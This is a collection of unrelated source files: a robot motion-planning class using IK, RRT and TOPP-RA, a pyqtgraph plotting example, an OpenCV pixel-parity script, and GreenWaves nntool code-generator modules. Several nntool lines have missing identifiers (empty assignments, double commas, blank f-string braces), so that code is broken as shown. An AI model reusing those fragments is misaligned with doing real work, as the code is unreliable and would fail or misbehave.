return status, results def TOPP(self, path, step=0.1, verbose=False): N_samples = path.shape[0] dof = path.shape[1] assert dof == len(self.joint_vel_limits) assert dof == len(self.joint_acc_limits) ss = np.linspace(0, 1, N_samples) path = ta.SplineInterpolator(ss, path) pc_vel = constraint.JointVelocityConstraint(self.joint_vel_limits) pc_acc = constraint.JointAccelerationConstraint(self.joint_acc_limits) instance = algo.TOPPRA( [pc_vel, pc_acc], path, parametrizer="ParametrizeConstAccel" ) jnt_traj = instance.compute_trajectory() ts_sample = np.linspace( 0, jnt_traj.duration, int(jnt_traj.duration / step) ) qs_sample = jnt_traj(ts_sample) qds_sample = jnt_traj(ts_sample, 1) qdds_sample = jnt_traj(ts_sample, 2) return ts_sample, qs_sample, qds_sample, qdds_sample, jnt_traj.duration def update_point_cloud(self, pc, resolution=1e-3): self.planning_world.update_point_cloud(pc, resolution) def update_attached_box(self, size, pose, link_id=-1): if link_id == -1: link_id = self.move_group_link_id self.planning_world.update_attached_box(size, link_id, pose) def plan( self, goal_pose, current_qpos, mask = [], time_step=0.1, rrt_range=0.1, planning_time=1, fix_joint_limits=True, use_point_cloud=False, use_attach=False, verbose=False, ): self.planning_world.set_use_point_cloud(use_point_cloud) self.planning_world.set_use_attach(use_attach) n = current_qpos.shape[0] if fix_joint_limits: for i in range(n): if current_qpos[i] < self.joint_limits[i][0]: current_qpos[i] = self.joint_limits[i][0] + 1e-3 if current_qpos[i] > self.joint_limits[i][1]: current_qpos[i] = self.joint_limits[i][1] - 1e-3 self.robot.set_qpos(current_qpos, True) collisions = self.planning_world.collide_full() if len(collisions) != 0: print("Invalid start state!") for collision in collisions: print("%s and %s collide!" % (collision.link_name1, collision.link_name2)) idx = self.move_group_joint_indices ik_status, goal_qpos = self.IK(goal_pose, current_qpos, mask) if ik_status != "Success": return {"status": ik_status} if verbose: print("IK results:") for i in range(len(goal_qpos)): print(goal_qpos[i]) goal_qpos_ = [] for i in range(len(goal_qpos)): goal_qpos_.append(goal_qpos[i][idx]) self.robot.set_qpos(current_qpos, True) status, path = self.planner.plan( current_qpos[idx], goal_qpos_, range=rrt_range, verbose=verbose, time=planning_time, ) if status == "Exact solution": if verbose: ta.setup_logging("INFO") else: ta.setup_logging("WARNING") times, pos, vel, acc, duration = self.TOPP(path, time_step) return { "status": "Success", "time": times, "position": pos, "velocity": vel, "acceleration": acc, "duration": duration, } else: return {"status": "RRT Failed. %s" % status} def plan_screw( self, target_pose, qpos, qpos_step=0.1, time_step=0.1, use_point_cloud=False, use_attach=False, verbose=False, ): self.planning_world.set_use_point_cloud(use_point_cloud) self.planning_world.set_use_attach(use_attach) qpos = np.copy(qpos) self.robot.set_qpos(qpos, True) def pose7D2mat(pose): mat = np.eye(4) mat[0:3, 3] = pose[:3] mat[0:3, 0:3] = quat2mat(pose[3:]) return mat def skew(vec): return np.array( [ [0, -vec[2], vec[1]], [vec[2], 0, -vec[0]], [-vec[1], vec[0], 0], ] ) def pose2exp_coordinate(pose: np.ndarray) -> Tuple[np.ndarray, float]: def rot2so3(rotation: np.ndarray): assert rotation.shape == (3, 3) if np.isclose(rotation.trace(), 3): return np.zeros(3), 1 if np.isclose(rotation.trace(), -1): return np.zeros(3), -1e6 theta = np.arccos((rotation.trace() - 1) / 2) omega = ( 1 / 2 / np.sin(theta) * np.array( [ rotation[2, 1] - rotation[1, 2], rotation[0, 2] - rotation[2, 0], rotation[1, 0] - rotation[0, 1], ] ).T ) return omega, theta omega, theta = rot2so3(pose[:3, :3]) if theta < -1e5: return omega, theta ss = skew(omega) inv_left_jacobian = ( np.eye(3) / theta - 0.5 * ss + (1.0 / theta - 0.5 / np.tan(theta / 2)) * ss @ ss ) v = inv_left_jacobian @ pose[:3, 3] return np.concatenate([v, omega]), theta self.pinocchio_model.compute_forward_kinematics(qpos) ee_index = self.link_name_2_idx[self.move_group] current_p = pose7D2mat(self.pinocchio_model.get_link_pose(ee_index)) target_p = pose7D2mat(target_pose) relative_transform = target_p @ np.linalg.inv(current_p) omega, theta = pose2exp_coordinate(relative_transform) if theta < -1e4: return {"status": "screw plan failed."} omega = omega.reshape((-1, 1)) * theta index = self.move_group_joint_indices path = [np.copy(qpos[index])] while True: self.pinocchio_model.compute_full_jacobian(qpos) J = self.pinocchio_model.get_link_jacobian(ee_index, local=False) delta_q = np.linalg.pinv(J) @ omega delta_q *= qpos_step / (np.linalg.norm(delta_q)) delta_twist = J @ delta_q flag = False if np.linalg.norm(delta_twist) > np.linalg.norm(omega): ratio = np.linalg.norm(omega) / np.linalg.norm(delta_twist) delta_q = delta_q * ratio delta_twist = delta_twist * ratio flag = True qpos += delta_q.reshape(-1) omega -= delta_twist def check_joint_limit(q): n = len(q) for i in range(n): if ( q[i] < self.joint_limits[i][0] - 1e-3 or q[i] > self.joint_limits[i][1] + 1e-3 ): return False return True within_joint_limit = check_joint_limit(qpos) self.planning_world.set_qpos_all(qpos[index]) collide = self.planning_world.collide() if ( np.linalg.norm(delta_twist) < 1e-4 or collide or within_joint_limit == False ): return {"status": "screw plan failed"} path.append(np.copy(qpos[index])) if flag: if verbose: ta.setup_logging("INFO") else: ta.setup_logging("WARNING") times, pos, vel, acc, duration = self.TOPP( np.vstack(path), time_step ) return { "status": "Success", "time": times, "position": pos, "velocity": vel, "acceleration": acc, "duration": duration, } ```
{ "source": "0000matteo0000/pyqtgraph", "score": 3 }
#### File: pyqtgraph/examples/ ```python import numpy as np import pyqtgraph as pg from pyqtgraph.Qt.QtWidgets import QMainWindow def mkStripedPen(colors, blending=0.0001, span=[0, 15], orientation="horizontal", width=2): stops = [] stops_colors = [] previous = None for i, color in enumerate(colors + [None]): pos = i / len(colors) if previous is not None: stops.append(pos - blending) stops_colors.append(previous) if color is not None: stops.append(pos) stops_colors.append(color) previous = color return pg.ColorMap(stops, stops_colors, mapping=pg.ColorMap.REPEAT).getPen(span=span, orientation=orientation, width=width) app = pg.mkQApp() mw = QMainWindow() mw.resize(800, 400) pg.setConfigOption("background", "w") pg.setConfigOption("foreground", "k") mpw = pg.MultiAxisPlotWidget() mw.setCentralWidget(mpw) # LEGEND mpw.addLegend(offset=(0, 0)) # TITLE mpw.setTitle("MultiAxisPlotWidget Example") # AXYS ax1 = mpw.addAxis("sx1", "bottom", text="Samples1", units="sx1") ax1c = "red" ax1.setPen(ax1c) ax2 = mpw.addAxis("sx2", "bottom", text="Samples2", units="sx2") ax2c = "green" ax2.setPen(ax2c) ay1 = mpw.addAxis("sy1", "left", text="Data1", units="sy1") ay1c = "cyan" ay1.setPen(ay1c) ay2 = mpw.addAxis("sy2", "left", text="Data2", units="sy2") ay2c = "magenta" ay2.setPen(ay2c) # CHARTS c0, pi0 = mpw.addChart("Dataset 0") c0.setPen("black") c1, pi1 = mpw.addChart("Dataset 1", xAxisName="sx1", yAxisName="sy1") c1.setPen(mkStripedPen([ax1c, ay1c])) c2, pi2 = mpw.addChart("Dataset 2", xAxisName="sx2", yAxisName="sy1") c2.setPen(mkStripedPen([ax2c, ay1c])) c3, pi3 = mpw.addChart("Dataset 3", xAxisName="sx2", yAxisName="sy2") c3.setPen(mkStripedPen([ax2c, ay2c])) # make and display chart mpw.makeLayout( # optional, selects and orders axes displayed. # remember to include the default axes if used. axes=["bottom", "sx1", "sx2", "sy2", "sy1", "left"], # optional, selects charts displayed charts=["Dataset 0", "Dataset 1", "Dataset 2", "Dataset 3"] ) mpw.enableAxisAutoRange() for i, c in enumerate([c0, c1, c2, c3, ], start=1): c.setData(np.array(np.sin(np.linspace(0, i * 2 * np.pi, num=1000)))) mpw.update() # Start Qt event loop unless running in interactive mode. if __name__ == '__main__': pg.exec() ```
{ "source": "0000sir/opencv-graphic-experiments", "score": 3 }
#### File: opencv-graphic-experiments/x-4/ ```python import cv2 import numpy as np def separate_frame(frame, width, height): odd_frame = np.zeros((height, width, 3), np.uint8) even_frame = np.zeros((height,width, 3), np.uint8) for x in range(0, height-1): for y in range(0, width-1): point = frame[x, y] r0 = point[2]%2==0 and point[2] or 0 g0 = point[1]%2==0 and point[1] or 0 b0 = point[0]%2==0 and point[0] or 0 r1 = point[2]%2==1 and point[2] or 0 g1 = point[1]%2==1 and point[1] or 0 b1 = point[0]%2==1 and point[0] or 0 even_frame[x,y] = [g0, r0, b0] odd_frame[x,y] = [g1, r1, b1] return (odd_frame, even_frame) img = cv2.imread('../people.jpg') #cv2.imshow('img', img) height, width = img.shape[:2] img0,img1 = separate_frame(img, width, height) cv2.imshow('img-0', img0) cv2.imshow('img-1', img1) cv2.waitKey(0) cv2.destroyAllWindows() ```
{ "source": "00-01/gap_sdk", "score": 2 }
#### File: nntool/execution/ ```python class ExecutionProgress(object): __instance = None def __new__(cls): if ExecutionProgress.__instance is None: ExecutionProgress.__instance = object.__new__(cls) return ExecutionProgress.__instance def __init__(self): if not hasattr(self, 'listeners'): self.listeners = [] @classmethod def progress(cls, step_idx, name): inst = cls() for func in inst.listeners: func(step_idx, name) @classmethod def start(cls): inst = cls() for func in inst.listeners: func(None, "start") @classmethod def end(cls): inst = cls() for func in inst.listeners: func(None, "end") @classmethod def listen(cls, func): inst = cls() inst.listeners.append(func) @classmethod def unlisten(cls, func): inst = cls() inst.listeners.remove(func) ``` #### File: symbolic/q15_quantization/ ```python from ..function import Function from ..symbol import nargs, Constant, c_headers, copy_props @nargs(1) @c_headers('"Gap.h"') @copy_props('to_qrec') class Q15ScaleFloat(Function): def __init__(self, *args, to_qrec=None, **kwargs): self._to_qrec = to_qrec super().__init__(*args, **kwargs) @property def to_qrec(self): return self._to_qrec def _eval(self, *args, **kwargs): if isinstance(args[0], Constant): return Constant(self._to_qrec.quantize_and_clip(args[0].value)) return args[0] def _impl(self, *args, **kwargs): val = args[0] return self._to_qrec.quantize_and_clip(val) def _py_expr(self, *args, **kwargs): val = args[0] return self._to_qrec.quantize_and_clip_py_expr(val) def _c_expr(self, *args, **kwargs): val = args[0] return self._to_qrec.quantize_and_clip_c_expr(val) def __repr__(self) -> str: return f"ScaleFloat({self.contents[0]}, ->[{self._to_qrec}])" ``` #### File: generation/at_generators/ ```python from .utils import at_bits GEN_POOL_RELU = "CNN_PoolReLU" # extern void CNN_PoolReLU( # char *Name, # CNN_GenControl_T *Ctrl, # int In_DataSize, # int Out_DataSize, # int In_InL3, // 1 if In comes from L3, 0 if it comes from L2 # int Out_InL3, # int InFeat, # int OutFeat, # int Width, # int Height, # KernelOper_T PoolOper, # int Fpx, # int Fpy, # int Dpx, # int Dpy, # int Spx, # int Spy, # int PoolPad, # KernelOper_T ReLUOper # ); # pylint: disable=too-many-arguments def gen_at_pool_relu(code_block, name, in_q, out_q, in_dim, out_dim, at_pool, at_active, gen_ctrl=None, at_ver=3): if gen_ctrl is None: gen_ctrl = "0" else: gen_ctrl = gen_ctrl.ctrl_name if at_pool.PoolOper == 'KOP_NONE': if in_dim.is_named and in_dim.has_keys(['c', 'w', 'h']): dims = [in_dim.c, in_dim.h, in_dim.w, in_dim.c] else: dims = in_dim.shape.copy() dims = dims + [1] * (4 - len(dims)) if out_dim.is_named and out_dim.has_key('c'): dims[3] = out_dim.c else: dims[3] = dims[0] else: dims = [in_dim.c, in_dim.h, in_dim.w, out_dim.c] if at_ver < 3: code_block.write('{}("{}", {}, {}, {}, 1, 1, {}, {}, {}, {},', GEN_POOL_RELU, name, gen_ctrl, at_bits(in_q), at_bits(out_q), dims[0], dims[3], dims[2], dims[1]) else: code_block.write('{}("{}", {}, {}, {}, {}, {}, 1, 1, {}, {}, {}, {},', GEN_POOL_RELU, name, gen_ctrl, at_bits( in_q), at_bits(out_q), in_q.q, out_q.q, dims[0], dims[3], dims[2], dims[1]) code_block.indent() code_block.write('{}, {}, {}, {}, {}, {}, {}, {}, {});', at_pool.PoolOper, at_pool.Fpx, at_pool.Fpy, at_pool.Dpx, at_pool.Dpy, at_pool.Spx, at_pool.Spy, at_pool.PoolPad, at_active.ReLUOper) code_block.deindent() ``` #### File: nntool/generation/ ```python from .templet import stringfunction import os import numpy as np GWT_HEADER = ''' /* * Copyright (C) 2017 GreenWaves Technologies * All rights reserved. * * This software may be modified and distributed under the terms * of the BSD license. See the LICENSE file for details. * */ ''' @stringfunction # pylint: disable=unused-argument def generate_main_appl_template(G, gen, test_inputs=None, test_outputs=None, tolerance=0.0): ''' ${GWT_HEADER} /* Autotiler includes. */ #include "${gen.project_name}.h" #include "${gen.project_name}Kernels.h" #ifdef __EMUL__ #define pmsis_exit(n) exit(n) #endif #ifndef STACK_SIZE #define STACK_SIZE 1024 #endif ${gen.flash_pointer} ${gen.project_name}_L3_Flash = 0; ${gen.generate_main_appl_inout_def(test_inputs, test_outputs)} static void cluster() { #ifdef PERF printf("Start timer\\n"); gap_cl_starttimer(); gap_cl_resethwtimer(); #endif ${gen.project_name}CNN(${gen.gen_inout_list()}); printf("Runner completed\\n"); ${gen.generate_output_check(tolerance, indent=1) if test_outputs else ""} } int test_${gen.project_name}(void) { printf("Entering main controller\\n"); /* ----------------> * Put here Your input settings * <--------------- */ #ifndef __EMUL__ /* Configure And open cluster. */ struct pi_device cluster_dev; struct pi_cluster_conf cl_conf; = 0; pi_open_from_conf(&cluster_dev, (void *) &cl_conf); if (pi_cluster_open(&cluster_dev)) { printf("Cluster open failed !\\n"); pmsis_exit(-4); } int cur_fc_freq = pi_freq_set(PI_FREQ_DOMAIN_FC, ${gen.opts['fc_freq']}); if (cur_fc_freq == -1) { printf("Error changing frequency !\\nTest failed...\\n"); pmsis_exit(-4); } int cur_cl_freq = pi_freq_set(PI_FREQ_DOMAIN_CL, ${gen.opts['cl_freq']}); if (cur_cl_freq == -1) { printf("Error changing frequency !\\nTest failed...\\n"); pmsis_exit(-5); } #ifdef __GAP9__ pi_freq_set(PI_FREQ_DOMAIN_PERIPH, 250000000); #endif #endif // IMPORTANT - MUST BE CALLED AFTER THE CLUSTER IS SWITCHED ON!!!! printf("Constructor\\n"); int ConstructorErr = ${gen.project_name}CNN_Construct(); if (ConstructorErr) { printf("Graph constructor exited with error: %d\\n(check the generated file ${gen.project_name}Kernels.c to see which memory have failed to be allocated)\\n", ConstructorErr); pmsis_exit(-6); } printf("Call cluster\\n"); #ifndef __EMUL__ struct pi_cluster_task task = {0}; task.entry = cluster; task.arg = NULL; task.stack_size = (unsigned int) STACK_SIZE; task.slave_stack_size = (unsigned int) SLAVE_STACK_SIZE; pi_cluster_send_task_to_cl(&cluster_dev, &task); #else cluster(); #endif ${gen.project_name}CNN_Destruct(); #ifdef PERF { unsigned int TotalCycles = 0, TotalOper = 0; printf("\\n"); for (unsigned int i=0; i<(sizeof(AT_GraphPerf)/sizeof(unsigned int)); i++) { printf("%45s: Cycles: %10u, Operations: %10u, Operations/Cycle: %f\\n", AT_GraphNodeNames[i], AT_GraphPerf[i], AT_GraphOperInfosNames[i], ((float) AT_GraphOperInfosNames[i])/ AT_GraphPerf[i]); TotalCycles += AT_GraphPerf[i]; TotalOper += AT_GraphOperInfosNames[i]; } printf("\\n"); printf("%45s: Cycles: %10u, Operations: %10u, Operations/Cycle: %f\\n", "Total", TotalCycles, TotalOper, ((float) TotalOper)/ TotalCycles); printf("\\n"); } #endif printf("Ended\\n"); pmsis_exit(0); return 0; } int main(int argc, char *argv[]) { printf("\\n\\n\\t *** NNTOOL ${gen.project_name} Example ***\\n\\n"); #ifdef __EMUL__ test_${gen.project_name}(); #else return pmsis_kickoff((void *) test_${gen.project_name}); #endif return 0; } ''' @stringfunction # pylint: disable=unused-argument def generate_main_appl_header(G, gen): ''' #ifndef __${gen.project_name}_H__ #define __${gen.project_name}_H__ #define __PREFIX(x) ${gen.project_name} ## x // Include basic GAP builtins defined in the Autotiler #include "Gap.h" #ifdef __EMUL__ #include <sys/types.h> #include <unistd.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/param.h> #include <string.h> #endif extern ${gen.flash_pointer} ${gen.project_name}_L3_Flash; #endif ''' @stringfunction # pylint: disable=unused-argument def generate_main_appl_make(G, gen, quantized, open_args=""): ''' NNTOOL=nntool ${"MODEL_SQ8=1" if gen.G.has_expressions or "SQ8" in gen.G.quantization.schemes_present or any(qrec.cache.get("ne16") for qrec in G.quantization.values()) else "# MODEL_SQ8=1"} ${"MODEL_POW2=1" if "POW2" in gen.G.quantization.schemes_present else "# MODEL_POW2=1"} ${"MODEL_FP16=1" if any(qrec.ktype == "float" for qrec in G.quantization.values()) else "# MODEL_FP16=1"} ${"MODEL_NE16=1" if any(qrec.cache.get("ne16") for qrec in G.quantization.values()) else "# MODEL_NE16=1"} MODEL_SUFFIX?= MODEL_PREFIX?=${gen.project_name} MODEL_PYTHON=python3 MODEL_BUILD=BUILD_MODEL$(MODEL_SUFFIX) TRAINED_MODEL = ${os.path.split(G.graph_identity.filename)[1]} MODEL_EXPRESSIONS = ${"$(MODEL_BUILD)/" + gen.opts['basic_kernel_source_file'] if gen.G.has_expressions else ""} NNTOOL_EXTRA_FLAGS += ${open_args} ${"MODEL_QUANTIZED=1" if quantized else ""} # Memory sizes for cluster L1, SoC L2 and Flash TARGET_L1_SIZE = ${gen.opts['l1_size']} TARGET_L2_SIZE = ${gen.opts['l2_size']} TARGET_L3_SIZE = ${gen.opts['l3_size']} # Cluster stack size for master core and other cores CLUSTER_STACK_SIZE=${gen.opts['cluster_stack_size']} CLUSTER_SLAVE_STACK_SIZE=${gen.opts['cluster_slave_stack_size']} CLUSTER_NUM_CORES=${gen.opts['cluster_num_cores']} NNTOOL_SCRIPT = nntool_script ${"APP_CFLAGS += -DSTD_FLOAT" if any(qrec[1].out_qs[0].dtype == np.float16 for qrec in G.quantization.sorted_iterator(G)) else ""} ${"APP_LDFLAGS += -lm" if gen.G.has_expressions and "FLOAT" in gen.G.quantization.schemes_present else ""} $(info GEN ... $(CNN_GEN)) ''' @stringfunction # pylint: disable=unused-argument def generate_main_appl_make_atproject(G, gen, quantized, model_path): ''' NNTOOL=nntool ${"MODEL_SQ8=1" if gen.G.has_expressions or "SQ8" in G.quantization.schemes_present or any(qrec.cache.get("ne16") for qrec in G.quantization.values()) else "# MODEL_SQ8=1"} ${"MODEL_POW2=1" if "POW2" in G.quantization.schemes_present else "# MODEL_POW2=1"} ${"MODEL_FP16=1" if "FLOAT" in G.quantization.schemes_present else "# MODEL_FP16=1"} ${"MODEL_NE16=1" if any(qrec.cache.get("ne16") for qrec in G.quantization.values()) else "# MODEL_NE16=1"} MODEL_SUFFIX?= MODEL_PREFIX?=${gen.project_name} MODEL_PYTHON=python3 MODEL_BUILD=BUILD_MODEL$(MODEL_SUFFIX) AT_MODEL_PATH=${model_path} MODEL_EXPRESSIONS = ${gen.opts['basic_kernel_source_file'] if gen.G.has_expressions else ""} ${"MODEL_QUANTIZED=1" if quantized else ""} # Memory sizes for cluster L1, SoC L2 and Flash TARGET_L1_SIZE = ${gen.opts['l1_size']} TARGET_L2_SIZE = ${gen.opts['l2_size']} TARGET_L3_SIZE = ${gen.opts['l3_size']} # Cluster stack size for master core and other cores CLUSTER_STACK_SIZE=${gen.opts['cluster_stack_size']} CLUSTER_SLAVE_STACK_SIZE=${gen.opts['cluster_slave_stack_size']} CLUSTER_NUM_CORES=${gen.opts['cluster_num_cores']} NNTOOL_SCRIPT = nntool_script $(info GEN ... $(CNN_GEN)) ''' ``` #### File: bindings/pow2/ ```python from generation.bindings import (CommentBindingList, GNodeArgEdge, NodeBindingList) from generation.generator_decorators import QREC_POW2, generation_function from graph.types import MatScaleFusionParameters @generation_function("bindings", (MatScaleFusionParameters,), qrec_types=(QREC_POW2, )) def matscale_bindings_generator(gen, node, qrec, in_eparams, out_eparams, cname) -> bool: set_matscale_bindings(gen, in_eparams, out_eparams, cname, node, qrec) return True def set_matscale_bindings(gen, in_eparams, out_eparams, cname, params, node_q): if params.fusion_type == "vec_scalar": gen.bindings.append( CommentBindingList("Node {} inq1 {} inq2 {} inq3 {} outq {}",, node_q.in_qs[0].q, node_q.in_qs[1].q, node_q.in_qs[2].q, node_q.out_qs[0].q) ) gen.bindings.append( NodeBindingList(cname, GNodeArgEdge(in_eparams[0]), GNodeArgEdge(in_eparams[1]), GNodeArgEdge( in_eparams[2]), GNodeArgEdge(out_eparams[0], "GNA_OUT"))) else: gen.bindings.append( CommentBindingList("Node {} inq1 {} inq2 {} outq {}",, node_q.in_qs[0].q, node_q.in_qs[1].q, node_q.out_qs[0].q) ) gen.bindings.append( NodeBindingList(cname, GNodeArgEdge(in_eparams[0]), GNodeArgEdge(in_eparams[1]), GNodeArgEdge(out_eparams[0], "GNA_OUT"))) ``` #### File: kernels/mult8/ ```python import logging from generation.at_types.gen_ctrl import GenCtrl from generation.code_block import CodeBlock from generation.generator_decorators import generation_function, QREC_MULT8 from graph.types import RNNParameters, LSTMParameters, GRUParameters from ..autotiler_kernel import AutotilerKernel LOG = logging.getLogger("nntool." + __name__) @generation_function("kernels", (RNNParameters, LSTMParameters, GRUParameters), qrec_types=(QREC_MULT8, )) def rnn_kernels_generator(gen, node, qrec, in_eparams, out_eparams, cname): del in_eparams, out_eparams, qrec gen.kernels.append(RNNKernel(, cname, node, at_ver=gen.opts['at_ver'], gen_ctrl=node.get_gen_ctrl())) return True # int RNN_Stack_SQ8( # char *Name, # CNN_GenControl_T *Ctrl, # int BiasDataSize, # int FeatDataSize, # int NCells, # int K0, # int K1, # int DimState, # int DimIn, # int AlwaysReset, # int Revert # ); # int LSTM_Stack_SQ8( # char *Name, # CNN_GenControl_T *Ctrl, # int BiasDataSize, # int FeatDataSize, # int NCells, # int K0, # int K1, # int DimState, # int DimIn, # int AlwaysReset, # int Revert # ); # int GRU_Stack_SQ8( # char *Name, # CNN_GenControl_T *Ctrl, # int BiasDataSize, # int FeatDataSize, # int NCells, # int K0, # int K1, # int DimState, # int DimIn, # int AlwaysReset, # int Revert # ); def gen_rnn_sq8(code_block, kname, cname, ctrl, ncells, k0, k1, dim_state, dim_in, revert): code_block.write( '{}("{}", {}, 4, 1, {}, {}, {}, {}, {}, 0, {});'.format(kname, cname, ctrl, ncells, k0, k1, dim_state, dim_in, revert)) class RNNKernel(AutotilerKernel): def __init__(self, node_name, cname, rnn_params, gen_ctrl=None, at_ver=3): if gen_ctrl is None: self.gen_ctrl = GenCtrl(None, cname=cname) else: gen_ctrl.cname = cname self.gen_ctrl = gen_ctrl if isinstance(rnn_params, RNNParameters): self.kname = "RNN_Stack_SQ8" elif isinstance(rnn_params, LSTMParameters): self.kname = "LSTM_Stack_SQ8" elif isinstance(rnn_params, GRUParameters): self.kname = "GRU_Stack_SQ8" if not rnn_params.linear_before_reset: # gen_ctrl.linear_before_reset = 0 raise ValueError("In {} linear_before_reset == 0 not supported by the Autotiler kernels") else: raise ValueError("unknown RNN parameter type") self.n_cells = rnn_params.n_cells self.n_states = rnn_params.n_states self.n_inputs = rnn_params.n_inputs self.n_input_cells = rnn_params.n_input_cells self.n_output_cells = rnn_params.n_output_cells self.revert = rnn_params.revert if not rnn_params.hard_act: gen_ctrl.rnn_use_hardact = 0 if not rnn_params.rnn_same_inout_scale: gen_ctrl.rnn_same_inout_scale = 0 self.cname = cname self.node_name = node_name self.at_ver = at_ver def code(self, code_block=None): if code_block is None: code_block = CodeBlock() code_block.comment("generator for {}", self.node_name) if not self.gen_ctrl.is_unmodified: self.gen_ctrl.gen_ctrl_decl(code_block) gen_ctrl = self.gen_ctrl.ctrl_name else: gen_ctrl = "0" gen_rnn_sq8(code_block, self.kname, self.cname, gen_ctrl, self.n_cells, self.n_input_cells, self.n_output_cells, self.n_states, self.n_inputs, self.revert and "1" or "0") return code_block ``` #### File: kernels/pow2/ ```python from generation.templet import stringfunction from generation.at_generators.utils import at_bits import logging from generation.at_generators import (NO_ACTIVATION, gen_active_at_params, gen_at_matrixadd, gen_at_matrixadddyn, gen_matrixadd_at_params, gen_matrixadddyn_at_params) from generation.at_types.gen_ctrl import GenCtrl from generation.code_block import CodeBlock from generation.generator_decorators import generation_function, QREC_POW2 from graph.types import MatrixAddParameters from ..autotiler_kernel import AutotilerKernel, NewAutoTilerKernel LOG = logging.getLogger("nntool." + __name__) @generation_function("kernels", (MatrixAddParameters, ), qrec_types=(QREC_POW2, )) def matadd_kernels_generator(gen, node, qrec, in_eparams, out_eparams, cname): del in_eparams, out_eparams if qrec.in_qs[0].q == qrec.in_qs[1].q and qrec.in_qs[0].q == qrec.out_qs[0].q: gen.kernels.append(MatrixAddKernel(cname, node, qrec, None, None, gen_ctrl=node.get_gen_ctrl(), at_ver=gen.opts['at_ver'])) else: gen.kernels.append(MatrixAddDynKernel(cname, node, qrec, None, None, gen_ctrl=node.get_gen_ctrl(), at_ver=gen.opts['at_ver'])) return True class MatrixAddKernel(AutotilerKernel): def __init__(self, cname, matrixadd_params, matrixadd_q, act_params, act_q, gen_ctrl=None, at_ver=3): if gen_ctrl is None: self.gen_ctrl = GenCtrl(None, cname=cname) else: gen_ctrl.cname = cname self.gen_ctrl = gen_ctrl at_matrixadd_params = gen_matrixadd_at_params(matrixadd_params) in_dim = matrixadd_params.in_dims[0] out_dim = matrixadd_params.out_dims[0] in_q1 = matrixadd_q.in_qs[0] in_q2 = matrixadd_q.in_qs[1] out_q = matrixadd_q.out_qs[0] if act_params is not None: at_act_params = gen_active_at_params(act_params) out_q = act_q.out_qs[0] if at_ver < 3: if act_params.activation == "relu6" and out_q.q != 0: self.gen_ctrl.ReluN = 6 << out_q.q self.gen_ctrl.ReluNNoNorm = 1 else: if act_params.activation == "relun": self.gen_ctrl.ReluN = act_params.activation_params else: at_act_params = NO_ACTIVATION self.at_matrixadd_params = at_matrixadd_params self.in_dim = in_dim self.out_dim = out_dim self.in_q1 = in_q1 self.in_q2 = in_q2 self.out_q = out_q self.at_act_params = at_act_params self.cname = cname self.node_name = self.at_ver = at_ver def code(self, code_block=None): if code_block is None: code_block = CodeBlock() code_block.comment("generator for {}", self.node_name) if not self.gen_ctrl.is_unmodified: self.gen_ctrl.gen_ctrl_decl(code_block) gen_at_matrixadd(code_block, self.cname, self.in_q1, self.in_q2, self.out_q, self.in_dim, self.out_dim, self.at_matrixadd_params, at_ver=self.at_ver, gen_ctrl=self.gen_ctrl) return code_block def insert_axis(shape, make_len): if len(shape) > make_len: raise ValueError(f'shape {shape} exceeds maximum length {make_len}') return tuple(([1] * (make_len - len(shape))) + shape) class MatrixAddDynKernel(NewAutoTilerKernel): CALL_TEMPLATE = ''' // generator for {node_name} CNN_MatAddDynAdjust("{cname}", {gen_ctrl}, {at_bits(in_q1)}, {at_bits(in_q2)}, {at_bits(out_q)}, {in_q1.q}, {in_q2.q}, {out_q.q}, 1, 1, 1, {in_shape[0]}, {out_shape[0]}, {in_shape[1]}, {in_shape[2]}, KOP_MATADD_DYNADJUST); ''' def __init__(self, cname, params, matrixadd_q, act_params, act_q, gen_ctrl=None, at_ver=3): if gen_ctrl is None: gen_ctrl = GenCtrl(None, cname=cname) else: gen_ctrl.cname = cname in_shape1 = insert_axis(params.in_dims[0].shape, 3) in_shape2 = insert_axis(params.in_dims[1].shape, 3) out_shape = insert_axis(params.out_dims[0].shape, 3) if in_shape1 != in_shape2 or in_shape1 != out_shape: raise ValueError(f'CNN_MatAddDynAdjust has been selected for {} but ' f'has shape {in_shape1} {in_shape2} -> {out_shape}') in_q1 = matrixadd_q.in_qs[0] in_q2 = matrixadd_q.in_qs[1] out_q = matrixadd_q.out_qs[0] if act_params is not None: raise ValueError(f'CNN_MatAddDynAdjust has been selected for {} but ' f'it has a fused activation which is not compatible') attrs = { 'in_q1': in_q1, 'in_q2': in_q2, 'out_q': out_q, 'in_shape': in_shape1, 'out_shape': out_shape } extra_attrs = { 'cname': cname, 'node_name': } super().__init__(attrs, extra_attrs, gen_ctrl=gen_ctrl) ``` #### File: new_generators/float/ ```python import logging from generation.at_types.at_params import NO_ACTIVATION, gen_activation_op from generation.at_types.gen_ctrl import GenCtrl from generation.bindings import (CommentBindingList, GNodeArgEdge, NodeBindingList) from generation.new_generators.mult8.matadd_mult8 import make_three_dims from generation.generators.kernels.autotiler_kernel import NewAutoTilerKernel from generation.new_generators.generator_base import (GeneratorBase, ktype, paramstype) from graph.types import MatrixAddParameters, PaddedAddFusionParameters from utils.node_id import NodeId LOG = logging.getLogger("nntool." + __name__) @paramstype(PaddedAddFusionParameters) @ktype("float") class PaddedMatAddFloatGenerator(GeneratorBase): @classmethod def globals_generator(cls, gen, node, qrec, pnode, fnode) -> bool: return True @classmethod def bindings_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool: step_idx = node.step_idx cnodes = node.contained_nodes() quants = [gen.G.quantization[NodeId(node, fnode)] for fnode in cnodes] add_node = [node for node in cnodes if isinstance( node, MatrixAddParameters)] if add_node: quants = [gen.G.quantization[NodeId( node, fnode)] for fnode in cnodes] gen.bindings.append( CommentBindingList("Node {} in1q {} in2q {} outq {}", cname, quants[1].in_qs[0], quants[1].in_qs[1], quants[-1].out_qs[0]) ) gen.bindings.append( NodeBindingList(cname, GNodeArgEdge(in_eparams[0]), GNodeArgEdge(in_eparams[1]), GNodeArgEdge(out_eparams[0], "GNA_OUT") )) return True @classmethod def kernel_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool: cnodes = node.contained_nodes() if len(cnodes) > 2: act_node = cnodes[2] else: act_node = None pad_node = cnodes[0] gen.kernels.append(PaddedMatAddKernelFloat(, cname, node, pad_node, act_node, at_ver=gen.opts['at_ver'], force_relu=gen.force_relu)) return True class PaddedMatAddKernelFloat(NewAutoTilerKernel): CALL_TEMPLATE = """ // generator for {node_name} CNN_MatAddPaddedAct_fp16("{cname}", {gen_ctrl}, {feat}, {width}, {height}, {padtop}, {padbot}, {padded_idx}, KOP_MATADD, {act_oper}); """ def __init__(self, node_name, cname, matrixadd_params, pad_params, 